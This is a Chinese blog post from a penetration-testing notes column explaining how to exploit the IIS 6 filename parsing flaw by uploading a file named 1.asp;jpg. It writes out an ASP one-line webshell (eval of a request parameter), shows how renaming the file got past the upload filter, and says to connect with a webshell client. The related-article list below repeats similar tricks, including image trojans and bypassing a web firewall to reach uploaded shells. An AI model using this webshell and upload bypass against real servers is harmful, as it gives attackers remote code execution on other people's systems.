iis6漏洞利用(x.asp;y.jpg篇)

最新推荐文章于 2022-11-26 23:01:11 发布
最新推荐文章于 2022-11-26 23:01:11 发布
阅读量1.1k 收藏
点赞数
分类专栏: 渗透笔记 文章标签: iis asp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bluerainlife/article/details/5573924
版权

iis6下的一个解析漏洞1.asp;2.jpg或1.asp;jpg

上传1.asp;2.jpg,出现Invalid file.无法上传

加gif89a绕过验证,结果也不行。

又后想到用一句话木马,<%eval request("##")%>保存为1.asp;2.jpg上传。

成功上传得到路径/userfiles/image/1_asp;2.jpg

发现1.asp又被替换成1_asp了。

把1.asp;2.jpg改为1.asp;jpg

成功得到路径/userfiles/image/1.asp;jpg

然后用一句话客户端连就可以咯.

bluerainlife
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jpg文件当作php文件来解析,解析漏洞
weixin_39737233的博客
04-06 1757
[+]IIS 6.01. 目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码。(或者在fider里面如果有topath的话尝试,直接加目录传Jpg)比如 在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。例如创建目录 wooyun.asp,那么/wooyu...
IIS_6.0文件解析漏洞及解决办法
04-07
IIS_6.0文件解析漏洞及解决办法IIS_6.0文件解析漏洞及解决办法IIS_6.0文件解析漏洞及解决办法
IIS短文件名漏洞利用工具.zip
05-12
信息收集
FCKEditor最新上传漏洞(ASP),允许上传“.asp;jpg”类型文件解决方案
weixin_30352645的博客
08-03 140
FCKEditor最新上传漏洞(ASP),允许上传“.asp;jpg”类型文件解决方案  近期公司大量网站受到攻击,造成很的损失。经过反复分析,发现原来是FCKEditor存在上传漏洞。这里,我针对此上传漏洞进行了修正,具体情况请见以下分析: 攻击表现:   接收上传的目录,发现有以“.asp;jpg”为扩展名的攻击文件。 攻击分析:  执行上传目录的“.asp;jpg”文件,发现它被当做一...
Microsoft IIS 解析文件名“x.asp;x.jpg/x.php;x.jpg漏洞
ξσ Dicky's Blog σξ
09-27 1303
当文件名为x.asp;x.jpg时,Microsoft IIS会自动以asp格式来进行解析。而当文件名为x.php;x.jpg时,Microsoft IIS会自动以php格式来进行解析。 所以我们只要上传后是x.asp;x.jpg这样的形式,就可以执行我们的马了,测试了下,x.php;x.jpg也是可以执行的。大家可以自己用虚拟机做一个简单的测试,出现这样的漏洞会造成许多网站被攻克!
文件上传之IIS6.0解析漏洞
一个普普通通的博客
03-15 4061
iis6.0解析漏洞
ii6 解析aspx页面
一切皆有联系
06-27 983
<br />操作系统:windows server 2003<br />1、安装.net framework<br />2、打开iis管理器-->点击节点'web服务扩展',这时可以看到,右边的窗口中有很多web服务扩展,有一项就是asp.net。默认是禁止的,允许该web服务扩展。这样就可以解析aspx页面了。
ASPJPG/PNG/BMP图片转base64位数据,可实现上传功能。
u011289462的博客
11-26 1235
asp上传图片之 转base64上传至服务器再保存为图片。可支持PNG、JPG、BMP
高危IIS6.0文件名解析漏洞终极解决办法
系统运维
12-21 1061
www.2cto.com:这篇文章设计方法应该是早就出来了,内容涉及引用,请大家参考 我之前就发现这个漏洞,我也无奈,后来我想到了rewrite这个东西,它可以用正则表达式匹配URL进行处理。 http://www.2cto.com /dir.asp/diy.jpg 比如这就是个diy.asp被更改成图片的文件 IIS6.0的漏洞可以运行它。 我的解决办法: 我在 http://ww...
iis6+asp.net服务器致命漏洞
diedangxiang4092的博客
12-31 130
前天同事发现了这个漏洞,今天我又在朋友的空间测试了下,确实可以运行一切命令, 至今为止,MS没有出补丁,估计中国又增加成千上万的肉鸡了。DDOS又要更猛了. It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping....
IIS6.rarIIS6.rar
02-01
IIS6.rarIIS6.rarIIS6.rar
iis6.rar_iis iis6_iis6 _iis6.rar
09-22
介绍了IIS 6.0相关功能及设置方法,很适合初学者学习!
iis6远程代码执行漏洞.zip
11-21
iis6远程代码执行漏洞.zip
第24课 iis解析漏洞利用
07-04
iis解析漏洞利用,通过学习文档内容,熟悉并掌握 IIS 写入漏洞利用工具的利用方法,了解具体的功能内容,亲自实践操作,并根据课程需求完成相关任务。 工具功能说明 IIS 写入漏洞利用工具是由桂林老兵写的一款...
IIS-文件解析漏洞
大方子
07-22 1万+
IIS6.0有2种解析漏洞 1. 目录解析 以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。 2. 文件解析 *.asp;.jpg 像这种畸形文件名在“;”后面的直接被忽略,也就是说当成 *.asp文件执行。 目录解析复现 ii6.0的服务器开启Active Server Pages服务拓展 新建一个text.jpg的文件 ...
渗透之——asp图片木马的制作和使用
热门推荐
冰河的专栏
12-11 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84959588 主要亮点:图片木马(可以正常打开显示的木马) 先看代码: 仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。 1、找一张图片,名字改成1.jpg 2、&lt;%eval request(“a”)%&gt;存为1.asp(就是一句话木马) 3、copy ...
安全狗IIS6.0解析webshell访问限制bypass
ccstuck的专栏
04-06 1765
在访问诸如:a.asp;.jpg/;a.asp;a.jpg/a.asp;a.jpgIIS6.0解析shell的时候会被网站安全狗拦截,可以用一些猥琐的方法绕过其限制来执行上传的webshell 安全狗功能 1、上传a.asp;.jpg/;a.asp;a.jpg/a.asp;a.jpg等不会被拦截。 2、访问a.asp;.jpg/;a.asp;a.jpg/a.asp;a.jpg
IIS6.0容器之解析漏洞复现
Louisnie
10-30 7359
漏洞简介 解析漏洞是指web服务器因对HTTP请求处理不当导致将非可执行的脚本,文件等当作可执行的脚本去执行.该漏洞一般配合web容器(iis,nginx,apache,tomcat等)的文件上传功能去使用,以获取服务器的权限. IIS5.X/6.X解析漏洞 对于IIS服务器5版本和6版本存在两个解析漏洞,分别为目录解析和文件解析 目录解析 简介:在网站下建立文件夹的名称中以.asp或.asa等作...
IIS5.x-6.x解析漏洞介绍
最新发布
07-15
IIS 5.x和6.x版本中存在一种解析漏洞,该漏洞允许攻击者绕过服务器上的某些安全限制来执行恶意代码。 这个漏洞的原因是由于IIS在处理某些特定类型的请求时存在缺陷。攻击者可以构造一些特殊的请求,使得IIS无法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值